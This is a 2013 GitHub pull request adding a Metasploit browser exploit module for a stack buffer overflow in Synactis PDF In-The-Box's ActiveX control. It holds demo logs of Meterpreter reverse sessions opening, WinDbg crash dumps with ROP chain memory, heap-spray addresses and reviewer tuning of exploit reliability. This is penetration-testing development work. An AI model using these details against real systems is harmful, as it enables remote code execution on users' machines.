Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add OSVDB-93754: Synactis PDF In-The-Box ConnectToSynactic Stack Buffer ... #1916

Merged
merged 5 commits into from Jun 7, 2013
Merged

Add OSVDB-93754: Synactis PDF In-The-Box ConnectToSynactic Stack Buffer ... #1916

merged 5 commits into from Jun 7, 2013

Conversation

wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Jun 7, 2013

This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX component, specifically PDF_IN_1.ocx. When a long string of data is given to the ConnectToSynactis function, which is meant to be used for the ldCmdLine argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry class pointer saved on the stack, and results in arbitrary code execution under the context of the user.

I downloaded the component from Logic Print 2013, which can be found here:
http://www.logic-print.com/en/printestimatingsoftware.html

Or, ask me for the trial for testing.

Demo:

msf exploit(synactis_connecttosynactis_bof) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Using URL: http://0.0.0.0:8080/thtF4sPSqZj
[*]  Local IP: http://10.0.1.76:8080/thtF4sPSqZj
[*] Server started.
msf exploit(synactis_connecttosynactis_bof) > 
[*] 10.0.1.79        synactis_connecttosynactis_bof - Requesting: /thtF4sPSqZj
[*] 10.0.1.79        synactis_connecttosynactis_bof - Target selected as: IE 8 on Windows XP SP3
[*] 10.0.1.79        synactis_connecttosynactis_bof - Using msvcrt ROP
[*] Sending stage (751104 bytes) to 10.0.1.79
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.79:1154) at 2013-06-06 20:02:00 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.79:1154) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3784)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1068
[+] Successfully migrated to process

@wchen-r7
Add OSVDB-93754: Synactis PDF In-The-Box ConnectToSynactic Stack Buff…
d3e57ff 
…er Overflow

This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX
component, specifically PDF_IN_1.ocx.  When a long string of data is given
to the ConnectToSynactis function, which is meant to be used for the ldCmdLine
argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry
class pointer saved on the stack, and results in arbitrary code execution under the
context of the user.
@wchen-r7
Remove whitespace
e559824
@corelanc0d3r
Copy link
Contributor

FYI - 0c0d2028 may be a slightly more reliable target for the DEPS in the tests that we did across various IE versions

@wchen-r7
Copy link
Contributor Author

wchen-r7 commented Jun 7, 2013

Thanks for the reminder, yeah, the Metasploit one is 0c0d2020 by default.... I forgot about that. I think I'll update that documentation.

jvazquez-r7
jvazquez-r7 reviewed Jun 7, 2013
View reviewed changes
modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb
var p2 = '';
eax = "#{eax}";

while (p1.length < 189) p1 += "\\x41";
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Can be randomized?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I've decided not to because it looks like you're landing here. I'll put this as 0x0c to make sure you get code execution. Same for the 0x42 padding.

@jvazquez-r7
Copy link
Contributor

It's not working for me on Windows XP SP3 / IE7:

(b20.fc4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\LOGICP~1\PDF_IN~1.OCX
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\LOGICP~1\PDF_IN~1.OCX - 
eax=41414141 ebx=056983ec ecx=01eecf08 edx=01eecd01 esi=008d9588 edi=00000000
eip=056883c0 esp=01eecdc4 ebp=01eecf08 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
PDF_IN_1!DllUnregisterServer+0x577f4:
056883c0 8b08            mov     ecx,dword ptr [eax]  ds:0023:41414141=????????
0:005> !exchain
01eecdc4: PDF_IN_1!DllUnregisterServer+57824 (056883f0)
01eecf10: 41414141
Invalid exception stack at 41414141
0:005> g
(b20.fc4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=01eec9f4 ebp=01eeca14 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
41414141 ??              ???

0:005> lmv m PDF_IN_1
start    end        module name
05620000 056b4000   PDF_IN_1 C (export symbols)       C:\LOGICP~1\PDF_IN~1.OCX
    Loaded symbol image file: C:\LOGICP~1\PDF_IN~1.OCX
    Image path: C:\LOGICP~1\PDF_IN~1.OCX
    Image name: PDF_IN~1.OCX
    Timestamp:        Sat Jun 20 00:22:17 1992 (2A425E19)
    CheckSum:         00000000
    ImageSize:        00094000
    File version:     1.2.0.0
    Product version:  1.2.0.0
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     040c.04e4
    CompanyName:      Synactis
    ProductName:      
    InternalName:     
    OriginalFilename: 
    ProductVersion:   1.0.0.0
    FileVersion:      1.2.0.0
    FileDescription:  PDF In-The-Box
    LegalCopyright:   Synactis
    LegalTrademarks:  Synactis
    Comments:

@jvazquez-r7
Copy link
Contributor

Working on IE7 right now:

> [*] 10.6.0.165       synactis_connecttosynactis_bof - Requesting: /hAfgzm
[*] 10.6.0.165       synactis_connecttosynactis_bof - Target selected as: IE 7 on Windows XP SP3
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:51498) at 2013-06-07 11:13:42 -0500
[*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:51498) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1428)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3828
[+] Successfully migrated to process

But not on IE8 /windows xp sp3 on my testing:

0:017> g
(dd0.d5c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\LOGICP~1\PDF_IN~1.OCX
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\LOGICP~1\PDF_IN~1.OCX - 
eax=0c0c0c0c ebx=039683ec ecx=20202020 edx=0201c601 esi=0201cab8 edi=00000000
eip=20202020 esp=0201c6bc ebp=0201c804 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
20202020 d318            rcr     dword ptr [eax],cl   ds:0023:0c0c0c0c=20202020
0:008> dd 0c0c0c0c
0c0c0c0c  20202020 20202020 20202020 20202020
0c0c0c1c  20202020 20202020 20202020 20202020
0c0c0c2c  20202020 20202020 20202020 20202020
0c0c0c3c  20202020 20202020 20202020 20202020
0c0c0c4c  20202020 20202020 20202020 20202020
0c0c0c5c  20202020 20202020 20202020 20202020
0c0c0c6c  20202020 20202020 20202020 20202020
0c0c0c7c  20202020 20202020 20202020 20202020
0:008> dd 20202020
20202020  77c218d3 41414141 20302024 77c1e844
20202030  41414141 77c1e844 77c4fa1c ffffffff
20202040  77c127e5 77c127e5 77c4e0da 2cfe1467
20202050  77c4eb80 77c58fbc 77c34fcd 2cfe04a7
20202060  77c4eb80 77c14001 77c3048a 77c47a42
20202070  77c46efb 77c2aacc 77c3b860 77c1110c
20202080  77c12df9 77c35459 f254c481 2bb8ffff
20202090  da814792 2474d9d1 c92b5ff4 47314bb1

@wchen-r7
Copy link
Contributor Author

wchen-r7 commented Jun 7, 2013

Looks like the offset isn't consistent. It's landing at 0c0c0c0c instead of 0x20302028.

@jvazquez-r7
Copy link
Contributor

After digging with @wchen-r7 , the overflow offset is dependant of the default browser configured in the machine. With ie8 as default browser, works fine:


[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:51989) at 2013-06-07 11:51:39 -0500
[*] Session ID 2 (10.6.0.165:4444 -> 10.6.0.165:51989) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2676)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3036
[+] Successfully migrated to process

@wchen-r7
Updates description about default browser setting
9c7b446
@wchen-r7
Change to AverageRanking
ea2895a 
Just to play with the firing order for Browser Autopwn, this one
should fire as late as possible.
@jvazquez-r7
Copy link
Contributor

Awesome, merging!

jvazquez-r7 pushed a commit that referenced this pull request Jun 7, 2013
Land #1916, @wchen-r7's exploit for Synactics PDF
a157e65
@jvazquez-r7 jvazquez-r7 merged commit ea2895a into rapid7:master Jun 7, 2013
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@wchen-r7 @corelanc0d3r @jvazquez-r7